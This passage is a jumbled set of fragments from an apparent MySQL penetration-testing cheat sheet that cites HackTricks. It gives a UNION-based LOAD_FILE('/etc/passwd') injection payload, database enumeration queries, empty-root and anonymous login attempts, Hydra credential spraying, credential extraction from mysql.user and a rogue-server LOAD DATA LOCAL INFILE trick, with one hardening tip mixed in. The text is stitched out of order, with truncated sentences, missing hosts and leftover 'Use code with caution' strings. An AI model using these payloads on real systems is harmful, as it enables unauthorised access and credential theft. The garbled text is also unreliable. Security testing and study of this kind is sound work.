If secure_file_priv permits, local files can be read using LOAD_FILE() : UNION SELECT 1, LOAD_FILE('/etc/passwd'), 3-- - Use code with caution. Writing Files (Achieving RCE via Web Shell)

: Restrict write access to the plugin_dir folder at the operating system level, ensuring the mysql runtime user cannot dynamically add unverified .so or .dll components.

SELECT version(); -- MySQL version (5.x vs 8.x matters) SELECT user(); -- Current user SELECT database(); -- Current DB SELECT grantee, privilege_type FROM information_schema.user_privileges; SHOW VARIABLES LIKE 'secure_file_priv'; -- Critical for file read/write SHOW VARIABLES LIKE 'plugin_dir'; -- UDF location

If you find an application that allows you to specify an arbitrary remote MySQL server to connect to, you can host a . When the victim application connects to your rogue server, your server can issue a LOAD DATA LOCAL INFILE request back to the client.

On HackTricks, "verified" methods are those that have been tested and confirmed to work under specific configurations. Key informative areas covered include:

Extract MySQL credentials from mysql.user :

If writing files is too basic, the most powerful feature verified by HackTricks is .

: Techniques for escalating privileges within the database or leveraging database access to compromise the underlying host. Verification and Community Trust

mysql-info : Fetches protocol version, thread ID, status flags, and capabilities.

The mysql_login module provides an efficient way to spray credentials across multiple targets simultaneously.

# Attempting an empty root login mysql -u root -h -p'' # Attempting anonymous login mysql -u "" -h Use code with caution. 3. SQL Injection (SQLi) Enablers

# Using Hydra for fast credential spraying hydra -L usernames.txt -P passwords.txt mysql Use code with caution. The Historical Authentication Bypass (CVE-2012-2122)